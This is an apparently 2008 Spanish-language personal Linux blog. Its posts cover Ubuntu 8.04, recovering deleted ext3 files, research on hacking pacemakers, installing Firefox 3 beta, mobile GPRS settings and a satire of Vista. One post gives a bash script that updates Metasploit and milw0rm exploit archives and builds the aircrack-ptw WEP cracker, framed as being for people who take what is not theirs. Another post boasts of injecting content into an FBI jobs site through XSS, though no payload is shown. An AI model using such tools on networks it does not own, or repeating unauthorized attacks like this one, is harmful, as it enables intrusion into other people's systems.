• Firefox 3 Beta 4 - sustituirá Firefox 2 y ahora es el navegador web por defecto en Ubuntu 8,04, pero lo más probable Firefox 3 Beta 5 estará disponible en la versión final;
• Vinagre - un nuevo cliente VNC, que ha de sustituir a la antigua xvnc4viewer;
• Brasero - el herramienta de grabacion de Hardy Heron.

Beside new applications, there are (as usual) Updated Applications . Además de las nuevas aplicaciones, hay (como de costumbre) Puesta al día de aplicaciones. Here is a list with the most important ones: Aquí hay una lista con las más importantes:

• GNOME 2.22.0
• Wine 0.9.57
• The GIMP 2.4.5
• Pidgin 2.3.1
• Filezilla 3.0.7.1
• Avidemux 2.4.1
... y muchos muchos más!


Nota completa: http://news.softpedia.com/news/What-To-Expect-From-Ubuntu-8-04-LTS-81246.shtml

domingo, 16 de marzo de 2008

Recuperar archivos borrados en EXT3

Sucede a todo el mundo tarde o temprano: una fracción de segundo después de que pulsas Enter te das cuenta de tu error, pero es demasiado tarde, acabas de eliminar un valioso archivo o directorio para el que no existe copia de seguridad. O tal vez... Sucede a todo el mundo tarde o temprano: una fracción de segundo después de que pulsas Enter te das cuenta de tu error, pero es demasiado tarde, acabas de eliminar un valioso archivo o directorio para el que no existe copia de seguridad. O tal vez tengas una copia de seguridad, pero es un mes de antiguedad.

pues aqui esta un how-to escrito por Carlo Wood.. está en fase beta pero funcional, que sirve para recuperar lso archivos borrados de particiones EXT3.

Aqui les dejo la liga del How-to escrito por Carlo Wood........... : http://www.xs4all.nl/%7Ecarlo17/howto/undelete_ext3.html

sábado, 15 de marzo de 2008

Los 'hackers' también atacan el corazón

Algunos marcapasos pueden ser manipulados desde el exterior por hackers con el fin de acceder a datos personales del paciente, según advierte un estudio publicado en EEUU.

Los riesgos para los pacientes en este momentos son bajos

El informe ha sido realizado por un grupo de científicos de las universidades de Washington y Massachusetts, que experimentaron con un modelo de marcapasos que emite al exterior datos sobre el estado del corazón del paciente.

Los investigadores descubrieron que esta señal puede ser interceptada y consiguieron acceder a datos personales del paciente como su fecha de nacimiento o número de la seguridad social.

Los científicos lograron, incluso, reprogramar el marcapasos, fabricado por Medtronic, para que se apagara o enviara corrientes eléctricas que podrían haber sido fatales si el aparato hubiera estado implantado en un ser humano.

Riesgo mínimo

"Los riesgos para los pacientes en este momentos son bajos, pero temo que pudieran aumentar en el futuro", dijo Tadayoshi Kohno, responsable del proyecto en la Universidad de Washington, a la prensa estadounidense.

El estudio insiste en que no hay motivo de alarma y que ningún paciente debería rechazar un marcapasos si lo necesita y aseguran que su finalidad es sólo "aumentar la seguridad, fiabilidad y privacidad de los marcapasos del futuro".

Añaden que el experimento necesitó una costosa maquinaria a la que pocos "hackers" tendrían acceso y que se realizó a pocos centímetros del marcapasos.

fuente: http://uwnews.org/article.asp?articleID=40358

jueves, 13 de marzo de 2008

Instala fácilmente Firefox 3 beta 4 en Ubuntu

Seguramente muchos de nosotros estamos ansiosos por probar la nueva versión del navegador web Firefox. Bueno, hoy les traigo una manera muy fácil de instalarlo en Ubuntu utilizando solamente un comando en la terminal.

lo que hay que hacer para instalar el Firefox 3 Beta, primero hay que guardar el perfil actual de nuestro firefox si es que queremos que se guarde nuestra configuración:

cp -r ~/.mozilla/firefox/ ~/firefox_profile_backup

Esto creará una carpeta llamada firefox_profile_backup en el directorio home en donde se guardarán todos los archivos de nuestro perfil.

Luego pasamos a la descarga e instalación de Firefox 3 beta 4:

wget -P ~ ftp://ftp.mozilla.org/pub/firefox/releases/3.0b4/linux-i686/en-US/firefox-3.0b4.tar.bz2 && tar xjf ~/firefox-3.0b4.tar.bz2 -C ~

Con esto ya lo tendremos instalado en nuestro equipo, ahora para ejecutarlo ponemos en nuestra terminal:

~/firefox/firefox

Nota: puedes crear un acceso directo a Firefox 3 beta 4 para mayor comodidad.

viernes, 7 de marzo de 2008

no pierdas tu tiempo


sin comentarios...

Salu2!

sábado, 23 de febrero de 2008

Internet gratis con telcel

Aki les traigo un mini-howto de como configurar tu celular ( en este caso un sony ericsson) para navegar en internet desde el mobil.. solo hay que seguir estos pasos para configurar..1) para configurar tu telefono, manda un mensaje con la palabra "Alta" al 789 para activar el uso de GPRS en tu equipo

recibirás un mensaje de k tu solicitud esta en proceso y te activaran el sevicio en 20 horas.. eso es lo k dice el mensaje pero normalmente ya puedes empazar a configurar apartir de los 30 minutos de haber recibido el msg (en mi caso asi sucedió)

2) pasados los 30 minutos de haber recibido el msg Ingresa al menú de tu teléfono y selecciona la opción de Ajustes, después selecciona Conectividad

3) Selecciona Comunic. de datos

4)
Selecciona Cuentas de datos, elige Nueva cuenta y oprime Agregar

5)
Selecciona Datos GPRS y en el campo de nombre escribe GPRS

6)
Selecciona el APN y oprimie Editar escribe wap.itelcel.com

7)
Nombre de usuario: iesgprs

8) Contraseña: iesgprs2002

9)
Oprime Guardar

10)
Selecciona la cuenta que creamos y oprime Editar

11)
Selecciona autenticación, oprime Selecc y elige Ninguna y oprime Desmarcar

12)
Selecciona CHAP y oprime Desmarcar finalmente oprime Aceptar

13)
Oprime 3 veces la tecla regresar

14) Entra a Ajustes de Internet y selecciona Perfiles de Internet

15)
Selecciona Nuevo Perfil y oprime Agregar, en nombre del perfil escribe Telcel GPRS

16)
Selecciona Conectar usando y elige la cuenta que acabamos de crear (GPRS)

17) Oprime Guardar

18) Selecciona el perfil creado Telcel GPRS y oprime Mas

19)
Entra a Ajustes y selecciona Conectar usando y elige la opción GPRS

20)
Uso de Proxy: Si

21)
Dirección Proxy: 148.233.151.240

22)
Numero de Puerto: 8080

23)
Oprime Guardar

24)
Oprime una vez la tecla regresar y selección Telcel GPRS

25)
Listo tu teléfono está configurado26) ahora ya puedes navegar con tu celular por medio de el navegador que viene incluido en los ericsson. o recomendaria que descargaran el mini opera, para navegar mejor . solo hy que meterte a la direccion www.mini.opera.com desde tu celular (ideas telcel/mas/escribir url ). lo descargas e instalas en tu celular.. ahora cada vez que desees conectarte a internet solo hay que meternos en el (menu principal/adm de archivos/Aplicaciones/Opera mini ) y listo.. a navegar, buscar cosas, firmar metros ..XD (wacala) , meternos a l msn (www.mobile.msn.com)..


Salu2!

sábado, 26 de enero de 2008

Updating aircrack-ng, kismet, milw0rm, metasploit



Para los amantes de lo ajeno..XD y quieren realizar actualizaciones, aki les dejo este code. guerdenlo como loquesea.sh y lo ejecutan desde la consola; se actualizará aircrack-ng, kismet, milw0rm, metasploit y se instalara el nuevo aircrack-ptw..

#! /bin/bash
# Written by ReL1K
# Updates Metasploit, Aircrack-Ng, Kismet, Milw0rm, AirCrack-PTW
#
#
#
echo "*** Updating Metasploit Framework 3 ***"
svn update /pentest/exploits/framework3/
echo "*** Updating Metasploit Framework 2 ***"
svn update /pentest/exploits/framework2/
echo "*** Updating Kismet COMMENTED OUT, Uncomment if you want to update Kismet ***"
#svn co http://svn.kismetwireless.net/code/trunk kismet-devel
#cd kismet-devel
#./configure && make clean && make && make install
#cd ..
echo "*** Updating AirCrack-NG ***"
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make clean && make && make install
echo "*** Updating Milw0rm SplOiTS ***"
cd /pentest/exploits/
update-milw0rm
echo "*** Adding AirCrack-PTW ***"
mkdir /pentest/wireless/aircrack-ptw
cd /pentest/wireless/aircrack-ptw
wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
gunzip aircrack-ptw-1.0.0.tar.gz
tar -xvf aircrack-ptw-1.0.0.tar
cd aircrack-ptw-1.0.0
gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap
cd ..
rm aircrack-ptw-1.0.0.tar
cd aircrack-ptw-1.0.0
cp aircrack-ptw /usr/local/bin
chmod 755 /usr/local/bin/aircrack-ptw
echo "*** Simply type aircrack-ptw to use ***"
echo "*** Updater Done ***"

domingo, 13 de enero de 2008

Cuatro razones para cambiar de Linux a Vista

Muy bien a mi me encanta Linux, pero quizá cuando pienses en cambiar del XP, deberías considerar Vista. Estas son las cuatro razones más importantes para cambiar de Linux a Vista.
1- Linux es aburrido. Al ejecutar Linux no experimento la emoción de preguntarme si un nuevo mensaje de correo electrónico, un Instant Messenger o una página Web va a transmitir a mi sistema el gusano o virus más reciente. ¿Que tiene de divertido eso? Sé que Microsoft promete que Vista representa cambios importantes y notorios en el SO, protegiéndolo por el bien de la seguridad... Ay, lo siento, estoy usando una cita de un artículo sobre el XP SP2 que se publicó en el 2003.
estoy seguro que, esta vez. Microsoft ofrece un sistema operativo seguro. Solo tenemos que observar el Internet Explorer 7, ¡es mucho más seguro! Pasó casi todo un día antes de que la compañía de seguridad Secunia descubriera sus debilidades.
Sé que algunos de ustedes piensan que la única razón por la que Windows recibe todo el malware es porque es muy popular. ¿Alguien atacaría a Linux? El simple hecho de que el 60% de los 100 millones de sitios Web del mundo se ejecutan en Linux, no es una razón para tratar de atacarlo.

2- Es muy difícil instalar Linux. Con Linux necesitarás insertar un CD o un DVD, presionar el botón de Enter, dar a tu computadora un nombre y escribir una contraseña para la cuenta de administrador. ¡Podrías romperte una uña haciendo todo eso!

3- Linux es costoso. A menudo, Linux es gratis, pero considera todo el tiempo que inviertes en configurarlo. La mayoría de las personas terminarán comprando PC nueva con el Vista previamente instalado.

4- Linux no tiene suficientes aplicaciones. La mayor parte de los sitemas Linux vienen sólo con los navegadores protegidos, como Firefox 2.0; los clientes de correo electrónico, como Evolution 2.6 y Thunderbird 1.5; los clientes de IM, como Gaim 1.5; las suites de oficina, como OpenOffice.org 2.0.4, etc. Micorosoft te ofrece Internet Explorer y Outlook Express, el navegador y el cliente de correo más populares que existen... aun cuando tienen algunos problemas de seguridad. Microsoft también incluye Office, que... ah, pero espera: no la obtienes con el Vista, ¿o sí?

Si lo piensas bien, encontrarás muchas razones para manejar el Vista en lugar de Linux. Sólo que no son buenas.


Open your mind, open your source. Use Linux!!! http://www.republicaubuntu.org.do/foro

sábado, 12 de enero de 2008

KDE 4.0

Aqui les dejo un video de algunas de las cosas que trae de nuevo el KDE 4.0 recien liberado:

domingo, 6 de enero de 2008

Un delincuente para el FBI ?

Pues resulta que ahora estoy en la lista de los mas buscados del FBI ..XD

Aprovechandome de una falla en la pagina del FBI www.fbijobs.gov meti unas imagenes por medio de un ataque XSS .. con esto se prueva la fiabilidad de los datos mencionados en dicha pagina, datos que puedesn ser utilizados al antojo del atacante en perjuicio de muchas personas y del gobierno de Estados Unidos..

aqui les dejo el enlace de los más buscados: most wanted
y por si querian mas. aki les dejo unos datos mios (claro k es por medio del ataque XSS) : Villatux

Salu2!